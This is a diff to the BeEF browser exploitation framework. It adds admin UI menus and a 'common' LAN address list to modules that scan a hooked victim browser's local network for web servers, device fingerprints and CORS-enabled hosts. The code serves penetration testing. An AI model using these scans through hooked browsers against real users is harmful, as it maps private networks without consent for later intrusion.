diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index 1acb3d86c..20d817c36 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -108,6 +108,12 @@
background-repeat: no-repeat;
}
+.network-host-ctxMenu-web {
+ background-image: url(../images/icons/web.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;
diff --git a/extensions/admin_ui/media/images/icons/web.png b/extensions/admin_ui/media/images/icons/web.png
new file mode 100644
index 000000000..fba0c645e
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/web.png differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
index b727db008..050dbd819 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -141,8 +141,170 @@ ZombieTab_Network = function(zombie) {
}
});
}
+ },{
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
}]
- });
+ });
emptygrid_menu.showAt(e.getXY());
},
rowcontextmenu: function(grid, rowIndex, e) {
@@ -158,7 +320,8 @@ ZombieTab_Network = function(zombie) {
grid.rowCtxMenu = new Ext.menu.Menu({
items: [
{
- text: 'Discover HTTP',
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
menu: {
xtype: 'menu',
items: [{
@@ -166,7 +329,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-host',
handler: function() {
var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip+'-'+ip}),
@@ -188,7 +351,7 @@ ZombieTab_Network = function(zombie) {
iconCls: 'network-host-ctxMenu-network',
handler: function() {
var mod_id = get_module_id("get_http_servers");
- commands_statusbar.update_sending('Scanning ' + ip_range + ' for HTTP servers...');
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
$jwterm.ajax({
contentType: 'application/json',
data: JSON.stringify({"ipRange":ip_range}),
diff --git a/extensions/network/extension.rb b/extensions/network/extension.rb
index d3c4d17f7..f76877c19 100644
--- a/extensions/network/extension.rb
+++ b/extensions/network/extension.rb
@@ -11,7 +11,7 @@ module Network
@short_name = 'network'
@full_name = 'Network'
- @description = ''
+ @description = "This extension provides a simple interface for interacting with hosts on a zombie browser's local area networks."
end
end
diff --git a/modules/network/cross_origin_scanner/command.js b/modules/network/cross_origin_scanner/command.js
index 440c86b17..382dc5f17 100644
--- a/modules/network/cross_origin_scanner/command.js
+++ b/modules/network/cross_origin_scanner/command.js
@@ -16,22 +16,44 @@ beef.execute(function() {
return;
}
- // set target IP range
- var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
- if (range == null || range[1] == null) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
- return;
- }
-
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (var i = lowerBound; i <= upperBound; i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
+ // set target IP addresses
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (var i = lowerBound; i <= upperBound; i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
WorkerQueue = function(frequency) {
diff --git a/modules/network/cross_origin_scanner/config.yaml b/modules/network/cross_origin_scanner/config.yaml
index 7cedc2e37..204067d05 100644
--- a/modules/network/cross_origin_scanner/config.yaml
+++ b/modules/network/cross_origin_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Cross-Origin Scanner"
- description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF."
+ description: "Scan an IP range for web servers which allow cross-origin requests using CORS. The HTTP response is returned to BeEF.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
# http://caniuse.com/cors
target:
diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js
index a7a503c6a..c1e9eabfb 100644
--- a/modules/network/get_http_servers/command.js
+++ b/modules/network/get_http_servers/command.js
@@ -13,10 +13,36 @@ beef.execute(function() {
var timeout = "<%= @timeout %>";
var wait = "<%= @wait %>";
var threads = "<%= @threads %>";
- var urls = new Array('/favicon.ico', '/favicon.png');
+ var urls = new Array('/favicon.ico', '/favicon.png', '/images/favicon.ico', '/images/favicon.png');
// set target IP addresses
- if (ipRange != null){
+ if (ipRange == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
// ipRange will be in the form of 192.168.0.1-192.168.0.254
// the fourth octet will be iterated.
// (only C class IP ranges are supported atm)
diff --git a/modules/network/get_http_servers/config.yaml b/modules/network/get_http_servers/config.yaml
index dd167d867..7ef33d540 100644
--- a/modules/network/get_http_servers/config.yaml
+++ b/modules/network/get_http_servers/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Get HTTP Servers (Favicon)"
- description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon."
+ description: "Attempts to discover HTTP servers on the specified IP range by checking for a favicon.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles"]
target:
user_notify: ["FF", "IE", "C", "S"]
diff --git a/modules/network/internal_network_fingerprinting/command.js b/modules/network/internal_network_fingerprinting/command.js
index a11a03862..ba68105cc 100644
--- a/modules/network/internal_network_fingerprinting/command.js
+++ b/modules/network/internal_network_fingerprinting/command.js
@@ -17,19 +17,8 @@ beef.execute(function() {
ports = ports.split(',');
}
- // set target LAN IP addresses
- if (ipRange != null){
- // ipRange will be in the form of 192.168.0.1-192.168.0.254
- // the fourth octet will be iterated.
- // (only C class IP ranges are supported atm)
- ipBounds = ipRange.split('-');
- lowerBound = ipBounds[0].split('.')[3];
- upperBound = ipBounds[1].split('.')[3];
- for (i=lowerBound;i<=upperBound;i++){
- ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
- ips.push(ipToTest);
- }
- } else {
+ // set target IP addresses
+ if (ipRange == 'common') {
// use default IPs
ips = [
'192.168.0.1',
@@ -49,6 +38,23 @@ beef.execute(function() {
'192.168.10.1',
'192.168.10.254'
];
+ } else {
+ // set target IP range
+ var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied");
+ return;
+ }
+ // ipRange will be in the form of 192.168.0.1-192.168.0.254
+ // the fourth octet will be iterated.
+ // (only C class IP ranges are supported atm)
+ ipBounds = ipRange.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (i=lowerBound;i<=upperBound;i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
}
/* Signatures in the form of:
diff --git a/modules/network/internal_network_fingerprinting/config.yaml b/modules/network/internal_network_fingerprinting/config.yaml
index 77f6d75b4..34173741a 100644
--- a/modules/network/internal_network_fingerprinting/config.yaml
+++ b/modules/network/internal_network_fingerprinting/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Network"
name: "Fingerprint Local Network"
- description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner."
+ description: "Discover devices and applications in the victim's Local Area Network.
This module uses a signature based approach - based on default logo images/favicons for known network device/applications - to fingerprint each IP address within the LAN.
Partially based on Yokosou and jslanscanner.
Note: set the IP address range to 'common' to scan a list of common LAN addresses."
authors: ["bcoles", "wade", "antisnatchor"]
target:
user_notify: ["FF", "IE", "C", "S"]